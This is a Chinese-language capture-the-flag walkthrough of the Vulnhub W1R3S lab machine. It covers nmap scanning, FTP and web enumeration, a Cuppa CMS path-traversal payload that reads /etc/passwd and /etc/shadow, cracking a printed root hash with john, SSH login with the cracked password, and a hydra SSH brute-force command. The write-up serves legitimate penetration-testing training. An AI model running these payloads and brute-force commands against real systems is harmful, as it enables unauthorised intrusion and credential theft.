Vulnhub-W1R3S 1.0.1
靶场介绍
靶场描述:
您已被雇用对W1R3S.inc个人服务器进行渗透测试并报告所有发现。他们要求您获得root访问权限并找到标志(位于/root目录中)。
获得低特权外壳的难度:初级/中级
获得权限升级的难度:初级/中级
靶场信息:
- https://www.vulnhub.com/entry/w1r3s-101,220/
- 10.10.10.3
信息收集
1.主机发现(ping扫描)
nmap -sn 10.10.10.0/24 |
1
2.端口探测
nmap -sT -min-rate 10000 -p- 10.10.10.3 -oA 10.10.10.3 |
参数 | 使用方法 | |
---|---|---|
-sT | TCP 扫描 | namp -sT 10.10.10.3 |
-min-rate {发包速率值} | 最小的发包速率 | namp -sT -min-rate 10000 10.10.10.3 |
-p- | 参数 -p 来指定设置我们将要扫描的端口号,-p-代表全部端口 | namp -sT -p- 10.10.10.3,namp -sT -p80,3306 10.10.10.3 |
-oA {文件名} | 可将扫描结果以标准格式、XML格式和Grep格式一次性输出 | namp -sT 10.10.10.3 -oA 10.10.10.3 |
根据nmap扫描的扫描结果看目标机器开放了21,22,80,3306这4个端口
端口范围缩小再次使用namp开对其进行收集更详细的详细
3.端口信息收集
nmap -sT -sV -sC -O -p21,22,80,3306 10.10.10.3 -oA 10.10.10.3 |
-sT | 获取端口的服务信息 |
---|---|
-sV | Version 版本检测扫描 |
-sC | 根据端口识别的服务,调用默认脚本 |
-O | 启用操作系统检测,-A来同时启用操作系统检测和版本检测 |
1.21端口开放ftp服务可以匿名登入 |
漏洞探测
21 ftp
ftp 10.10.10.3 |
Using binary mode to transfer files-->使用二进制模式传输文件 |
- 在ftp中有三个文件,别进入查看都是txt的文本是gte命令全部下载到本地进行分析
mget *.txt |
分别对ftp下载的txt文件进行查看分析寻找有利信息
cat *.txt #查看所有的txt文件或者一个一个看
New FTP Server For W1R3S.inc(没有获取什么有价值的信息)
- md5解密:This is not a password 翻译过来这不是密码(没有获取什么有价值的信息)
base64解密(没有获取什么有价值的信息)
- 员工名单可以注意一下,员工名字可能是账号,在遇到登入的时候可以作为爆破字典
- 该文件看样子是倒过过开和反序了使用工具或者截图下来旋转一下
https://www.upsidedowntext.com/
没有获取什么有价值的信息
- 分析结果总结
1.user:
Naomi
Hector
Joseph
Albert
Gina
Rico
3306 mysql
21端口没有发现尝试一下3306端口
mysql -h 10.10.10.3 -u root -p |
无法连接
80 http
访问80http搭建的服务
这是一个apache的默认页面,没有发现可以利用的
目录扫描
dirsearch -u 10.10.10.3 |
目录扫描发现有有价值信息
1.http://10.10.10.3/administrator访问后发现这是一个Cuppa CMS框架的安装页面
2.http://10.10.10.3/javascript访问后报错403
3.http://localhost/wordpress和http://localhost/wordpress/wp-login.php很明显这是wordpress这是一个博客框架不过无法正常访问尝试需要更改访问,依旧无法访问
2,3点都无法访问,那重点放到Cuppa CMS框架的安装页面上
使用浏览器对其框架进行历史漏洞搜索或者使用kali中的searchsploit 工具查看是否有历史漏洞
搜索发现在这个Cuppa CMS框架的安装页面上存在文件包含漏洞
searchsploit搜索
searchsploit cuppa cms |
漏洞利用
根据25971.txt文档利用文件包含漏洞读取文件
/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd |
无法正常的读取,使用post进行尝试
利用插件hackBar来post发包或者使用burp
post读取正常可以利用
../../../../../../../../../etc/shadow |
保存这些有哈希的用户
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7::: |
john解哈希
john 10.10.10.3.hash |
user1:w1r3s |
ssh w1r3s@10.10.10.3 |
登入成功
提权
sudo -l #显示出自己(执行 sudo 的使用者)的权限 |
发现w1r3s用户有root权限,无需提权
flag
cat flag.txt |
扩展
最后没有利用到22端口,可以利用字典来对22端口进行一个爆破
hydra -L user.txt(用户名字典) -P passwd(密码字典) ssh://10.10.10.3 -t 4 |